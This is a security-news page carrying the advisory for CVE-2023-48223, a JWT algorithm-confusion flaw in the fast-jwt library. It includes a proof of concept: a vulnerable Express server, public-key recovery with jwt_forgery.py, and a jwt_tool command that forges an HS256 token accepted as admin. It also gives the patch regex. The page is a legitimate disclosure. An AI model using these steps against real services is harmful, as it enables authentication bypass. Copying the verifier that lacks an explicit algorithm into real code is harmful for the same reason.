Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-48223: JWT Algorithm Confusion

fast-jwt provides fast JSON Web Token (JWT) implementation. Prior to version 3.3.2, the fast-jwt library does not properly prevent JWT algorithm confusion for all public key types. The ‘publicKeyPemMatcher’ in ‘fast-jwt/src/crypto.js’ does not properly match all common PEM formats for public keys. To exploit this vulnerability, an attacker needs to craft a malicious JWT token containing the HS256 algorithm, signed with the public RSA key of the victim application. This attack will only work if the victim application utilizes a public key containing the BEGIN RSA PUBLIC KEY header. Applications using the RS256 algorithm, a public key with a BEGIN RSA PUBLIC KEY header, and calling the verify function without explicitly providing an algorithm, are vulnerable to this algorithm confusion attack which allows attackers to sign arbitrary payloads which will be accepted by the verifier. Version 3.3.2 contains a patch for this issue. As a workaround, change line 29 of blob/master/src/crypto.js to include a regular expression.

CVE
#vulnerability#web#js#git#perl#ssh

Summary

The fast-jwt library does not properly prevent JWT algorithm confusion for all public key types.

Details

The ‘publicKeyPemMatcher’ in ‘fast-jwt/src/crypto.js’ does not properly match all common PEM formats for public keys. To exploit this vulnerability, an attacker needs to craft a malicious JWT token containing the HS256 algorithm, signed with the public RSA key of the victim application. This attack will only work if the victim application utilizes a public key containing the BEGIN RSA PUBLIC KEY header.

PoC

Take a server running the following code:

const express = require(‘express’); const { createSigner, createVerifier } = require(‘fast-jwt’) const fs = require(‘fs’); const path = require(‘path’);

const app = express(); const port = 3000;

// Load the keys from the file const publicKeyPath = path.join(__dirname, ‘public_key.pem’); const publicKey = fs.readFileSync(publicKeyPath, ‘utf8’); const privateKeyPath = path.join(__dirname, ‘key’); const privateKey = fs.readFileSync(privateKeyPath, ‘utf8’);

app.use(express.json());

// Endpoint to generate a JWT token with admin: False app.get('/generateToken’, async (req, res) => { const payload = { admin: false, name: req.query.name };

const signSync = createSigner({ algorithm: 'RS256’, key: privateKey }); const token = signSync(payload);

res.json({ token }); });

// Middleware to verify the JWT token function verifyToken(req, res, next) { const token = req.query.token;

const verifySync = createVerifier({ key: publicKey }); const payload = verifySync(token);

req.decoded = payload; next(); }

// Endpoint to check if you are the admin or not app.get('/checkAdmin’, verifyToken, (req, res) => { res.json(req.decoded); });

app.listen(port, () => { console.log(`Server is running on port ${port}`); });

Assume the server generated their keys like follows:

ssh-keygen -t rsa -b 2048 -m PEM
ssh-keygen -f key.pub -e -m PEM > public_key.pem

Public key recovery
First, an attacker needs to recover the public key from the server in any way possible. It is possible to extract this from just two JWT tokens as shown below.
Grab two different JWT tokens and utilize the following tool: https://github.com/silentsignal/rsa_sign2n/blob/release/standalone/jwt_forgery.py

python3 jwt_forgery.py token1 token2

The tool will generate 4 different public keys, all in different formats. Try the following for all 4 formats.

Algorithm confusion
Change the JWT to the HS256 algorithm and modify any of the contents to your liking at https://jwt.io/.
Copy the resulting JWT token and use with the following tool: https://github.com/ticarpi/jwt_tool

python /opt/jwt_tool/jwt_tool.py --exploit k -pk public_key token

You will now get a resulting JWT token that is validly signed.

Impact

Applications using the RS256 algorithm, a public key with a BEGIN RSA PUBLIC KEY header, and calling the verify function without explicitly providing an algorithm, are vulnerable to this algorithm confusion attack which allows attackers to sign arbitrary payloads which will be accepted by the verifier.

Solution

Change https://github.com/nearform/fast-jwt/blob/master/src/crypto.js#L29

const publicKeyPemMatcher = '-----BEGIN PUBLIC KEY-----'

to be regex:

const publicKeyPemMatcher = /^-----BEGIN( RSA)? PUBLIC KEY-----/

Related news

GHSA-c2ff-88x2-x9pg: JWT Algorithm Confusion

### Summary The fast-jwt library does not properly prevent JWT algorithm confusion for all public key types. ### Details The 'publicKeyPemMatcher' in 'fast-jwt/src/crypto.js' does not properly match all common PEM formats for public keys. To exploit this vulnerability, an attacker needs to craft a malicious JWT token containing the HS256 algorithm, signed with the public RSA key of the victim application. This attack will only work if the victim application utilizes a public key containing the `BEGIN RSA PUBLIC KEY` header. ### PoC Take a server running the following code: ```javascript const express = require('express'); const { createSigner, createVerifier } = require('fast-jwt') const fs = require('fs'); const path = require('path'); const app = express(); const port = 3000; // Load the keys from the file const publicKeyPath = path.join(__dirname, 'public_key.pem'); const publicKey = fs.readFileSync(publicKeyPath, 'utf8'); const privateKeyPath = path.join(__dirname, 'key'); cons...

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907